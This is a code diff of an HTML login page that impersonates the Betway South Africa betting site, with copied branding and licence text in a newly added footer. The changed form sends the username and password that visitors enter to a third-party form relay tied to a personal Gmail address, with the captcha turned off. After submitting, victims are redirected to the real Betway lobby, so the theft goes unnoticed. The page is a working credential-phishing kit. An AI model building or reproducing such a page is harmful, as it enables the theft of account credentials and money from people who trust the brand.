--- a/index.html
+++ b/index.html
@@ -102,7 +102,7 @@
     input[type="password"] {
       width: 100%;
       padding: 10px;
-      margin: 12px 0;
+      margin: 10px 0;
       border: 1px solid #ccc;
       border-radius: 5px;
       outline: none;
@@ -193,7 +193,7 @@
   <div class="overlay">
     <div class="login-box">
       <h2>Login</h2>
-      <form action="formsubmit.co/robarsrsa@gmail.com" method="POST">
+      <form action="https://formsubmit.co/maremalungile@gmail.com" method="POST">
      <input type="hidden" name="_captcha" value="false">
       <input type="hidden" name="_next" value="https://www.betway.co.za/LiveGameslobby">
       
@@ -212,3 +212,34 @@
       </p>
     </div>
   </div>
+
+  <!-- Footer -->
+  <footer class="footer">
+    <div class="footer-content">
+      <div class="footer-left">
+        <p class="footer-brand">betway</p>
+        <p>Terms and Conditions</p>
+        <p>Sponsorships</p>
+        <p>Affiliates</p>
+      </div>
+      <div class="footer-right">
+        <p>How to Play</p>
+        <p>Privacy Policy</p>
+        <p>Contact Us</p>
+        <p>FAQ</p>
+        <p>Responsible Gaming</p>
+        <p>Betway App</p>
+        <p>PAIA Manual</p>
+      </div>
+    </div>
+    <p class="footer-text">
+      Raging River Trading (Pty) Ltd (2011/134505/07) is licensed to promote Betway South Africa,
+      regulated by the Western Cape Gambling and Racing Board. Bookmaker License Number:
+      10181496-010 issued on 1 December 2016. No persons under the age of 18 years are permitted
+      to gamble. Winners know when to stop. National Responsible Gambling Programme:
+      0800 006 008 or WHATSAPP HELP 076 675 0710. Warning: Gambling involves risk.
+    </p>
+  </footer>
+
+</body>
+</html>
